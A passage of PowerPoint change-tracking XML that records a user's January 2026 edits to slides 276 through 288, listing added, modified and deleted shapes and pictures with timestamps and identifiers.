        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:28.684" v="4240"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2691321914" sldId="276"/>
            <ac:spMk id="4" creationId="{CB7BB477-02E6-78AC-423F-DDC5F9812C01}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:50:20.325" v="2023" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2691321914" sldId="276"/>
            <ac:spMk id="14" creationId="{9F9E4A39-AA65-DF53-E593-82BF033D0D9B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod modCrop">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:50:15.324" v="2022" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2691321914" sldId="276"/>
            <ac:picMk id="6" creationId="{6B59B561-8623-0581-F980-6C18FDC32F06}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:34:54.319" v="4370" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2192015288" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:33:56.551" v="4364" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2192015288" sldId="277"/>
            <ac:spMk id="3" creationId="{20D28490-365A-C5F2-46D0-5C8DFFA6D7AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T14:16:31.802" v="1930" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2192015288" sldId="277"/>
            <ac:spMk id="5" creationId="{060FA87E-6B17-ADB8-3B2A-3F11FDCDB2F9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:35.462" v="4243"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2192015288" sldId="277"/>
            <ac:spMk id="6" creationId="{18C6A144-B2BF-DC78-97F6-C8AFB7425F4B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:34:54.319" v="4370" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2192015288" sldId="277"/>
            <ac:picMk id="8" creationId="{DAA3403A-5229-4695-5A13-65C58C609E3A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:38.022" v="4244"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="122244190" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T14:04:48.199" v="1712" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="122244190" sldId="278"/>
            <ac:spMk id="3" creationId="{479C91E5-80F8-9863-6DC0-91801DF83920}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:38.022" v="4244"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="122244190" sldId="278"/>
            <ac:spMk id="5" creationId="{02F8618F-1123-9AD4-070B-994AF5ABB922}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T14:19:41.312" v="1944" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="122244190" sldId="278"/>
            <ac:spMk id="6" creationId="{2BC48B6C-17A4-82F3-03B8-0BA941A0F754}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition delAnim modAnim">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:50:13.441" v="4373" actId="21"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1829144236" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-24T14:25:42.694" v="1954" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1829144236" sldId="279"/>
            <ac:spMk id="53" creationId="{A5F993AD-65F5-DDDA-CA50-D7D30430CC05}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-30T12:50:13.441" v="4373" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1829144236" sldId="279"/>
            <ac:picMk id="4" creationId="{8E35841E-B45C-8096-5295-F922097B6DA0}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:39.909" v="4245"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3456156655" sldId="280"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:51:06.180" v="2024" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="9" creationId="{1F53D55C-0969-E02E-5D11-5CDFC63EEF92}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:52:57.924" v="2068" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="10" creationId="{F5F1C779-0A7E-648A-F22C-52B7CAE1C1D6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:54:45.003" v="2093" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="11" creationId="{9A0B6238-7ADC-D0C3-9548-8532309B410D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:55:47.641" v="2116" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="12" creationId="{181F3909-8DEE-830C-9D6B-5E6314451369}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:01:18.511" v="2136" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="13" creationId="{4D8C1219-EBE4-4C51-0456-BFCC2AA5834B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:03:06.143" v="2173" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="14" creationId="{B1B5B16C-4D37-2B35-3068-0FCC1233CB00}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:52:12.548" v="2048" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="15" creationId="{02744B09-91C3-FDF0-B449-AD244A02FA1B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:53:45.811" v="2076" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="16" creationId="{0A371DF8-BABF-55C3-9A27-8D03FF3AEB6E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T13:55:20.811" v="2110" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="17" creationId="{CA97C191-59AB-0D4D-E20B-99FAAF66F490}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:00:33.423" v="2124" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="18" creationId="{694A52D0-182A-7170-A043-FA6C293490F5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:02:16.311" v="2144" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="19" creationId="{6D711487-A035-4326-70A2-43A517B3ECA0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:39.909" v="4245"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3456156655" sldId="280"/>
            <ac:spMk id="22" creationId="{CD215A11-542B-520B-F309-5CB15353E8AE}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:41.693" v="4246"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2487870937" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:08:31.884" v="2317" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2487870937" sldId="281"/>
            <ac:spMk id="3" creationId="{5FF522E6-CBC9-39E8-157A-1AD936D72996}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:41.693" v="4246"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2487870937" sldId="281"/>
            <ac:spMk id="7" creationId="{C3467ED7-844D-5C48-9283-F6E3E119D5DB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:08:56.004" v="2379" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2487870937" sldId="281"/>
            <ac:spMk id="9" creationId="{C10C390D-046D-169F-771A-DF46A9409784}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:08:13.612" v="2263" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2487870937" sldId="281"/>
            <ac:picMk id="6" creationId="{68B3269E-7591-2DD3-714B-6B7DB327B228}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:43.325" v="4247"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3512378706" sldId="282"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:13:03.738" v="2406" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3512378706" sldId="282"/>
            <ac:spMk id="3" creationId="{574FF576-AA56-8859-5E98-BAEDF31672F2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:17:33.896" v="2408" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3512378706" sldId="282"/>
            <ac:spMk id="4" creationId="{D26194A9-E004-0AF6-8F40-D9F949C59A12}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:43.325" v="4247"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3512378706" sldId="282"/>
            <ac:spMk id="5" creationId="{3703FC48-72AC-0136-5FFA-50EB1FCD7372}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:21:18.086" v="2496" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3512378706" sldId="282"/>
            <ac:spMk id="6" creationId="{96F4DA6D-6A40-7852-8FEF-5D9B5FBA852B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:48.990" v="4248"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="520964460" sldId="283"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:26:32.138" v="2535" actId="403"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="520964460" sldId="283"/>
            <ac:spMk id="7" creationId="{8EB11C2B-CF4B-92BE-1CD2-3C9994ACDDBE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:48.990" v="4248"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="520964460" sldId="283"/>
            <ac:spMk id="8" creationId="{DFE6D31B-19A8-4E54-FC79-813595AE2899}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:51.189" v="4249"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4028692583" sldId="284"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:28:18.650" v="2574" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4028692583" sldId="284"/>
            <ac:spMk id="3" creationId="{5D0A07EE-CA83-414F-9902-2954B2C2143A}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:34:32.880" v="2636" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4028692583" sldId="284"/>
            <ac:spMk id="6" creationId="{E2861835-D175-1801-04E0-08356B58B78C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:36:25.975" v="2656" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4028692583" sldId="284"/>
            <ac:spMk id="11" creationId="{0804DDE1-2AD9-1E20-889D-3A90C1AFFB96}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:51.189" v="4249"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4028692583" sldId="284"/>
            <ac:spMk id="12" creationId="{0BD64879-8E0D-794E-F339-BEAA9DDA139E}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:52.725" v="4250"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="705102996" sldId="285"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:32:06.801" v="2623" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="705102996" sldId="285"/>
            <ac:spMk id="3" creationId="{C3065350-7877-7AFD-BACA-0382E32F393F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:52.725" v="4250"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="705102996" sldId="285"/>
            <ac:spMk id="5" creationId="{5DCC8925-9532-70D3-6A03-311BC9AF11BA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:44:13.073" v="2689"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="705102996" sldId="285"/>
            <ac:spMk id="6" creationId="{71AF4317-11B8-2ECF-4694-5E889945A813}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:54.237" v="4251"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1736062104" sldId="286"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:44:36.284" v="2699" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1736062104" sldId="286"/>
            <ac:spMk id="3" creationId="{7315824B-A156-F6FE-9AD8-1CF8D90F1FDD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:54.237" v="4251"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1736062104" sldId="286"/>
            <ac:spMk id="5" creationId="{C4AB2E47-052E-8BB5-7E58-AFEB1965B223}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:51:14.979" v="2783" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1736062104" sldId="286"/>
            <ac:spMk id="7" creationId="{B2CEE372-110F-6274-EAF6-91A73A17BAC5}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:55.588" v="4252"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2368034191" sldId="287"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:54:36.086" v="2793" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2368034191" sldId="287"/>
            <ac:spMk id="3" creationId="{0D8393C3-2B3E-5F22-3E33-11A08B01939F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:55.588" v="4252"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2368034191" sldId="287"/>
            <ac:spMk id="5" creationId="{3953367D-BB17-8D08-2BEB-A09D438BD5E3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T14:57:13.624" v="2819" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2368034191" sldId="287"/>
            <ac:spMk id="6" creationId="{18EC2415-7534-2419-64AB-98FFA7BD3803}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T15:00:30.694" v="2843" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2368034191" sldId="287"/>
            <ac:spMk id="11" creationId="{E6FE4573-E703-2924-1850-70F01FF4835D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add mod ord modTransition">
        <pc:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:57.453" v="4253"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1104636993" sldId="288"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T15:01:58.362" v="2860" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1104636993" sldId="288"/>
            <ac:spMk id="3" creationId="{64ED1897-BC5A-564C-B852-33118E17D7B3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-29T19:40:57.453" v="4253"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1104636993" sldId="288"/>
            <ac:spMk id="5" creationId="{DF434B90-3D6E-BCFF-A915-C14AD6A63D70}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Lucas Lemes" userId="9e3ed1f6f88ac9b0" providerId="LiveId" clId="{399D0681-FB96-4098-8AB6-96D4F908B2C3}" dt="2026-01-28T15:08:09.296" v="2931" actId="404"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1104636993" sldId="288"/>
            <ac:spMk id="6" creationId="{E6D2B860-0C90-7DD5-A5D0-2FECCDEC6E50}"/>
          </ac:spMkLst>
        </pc:spChg>
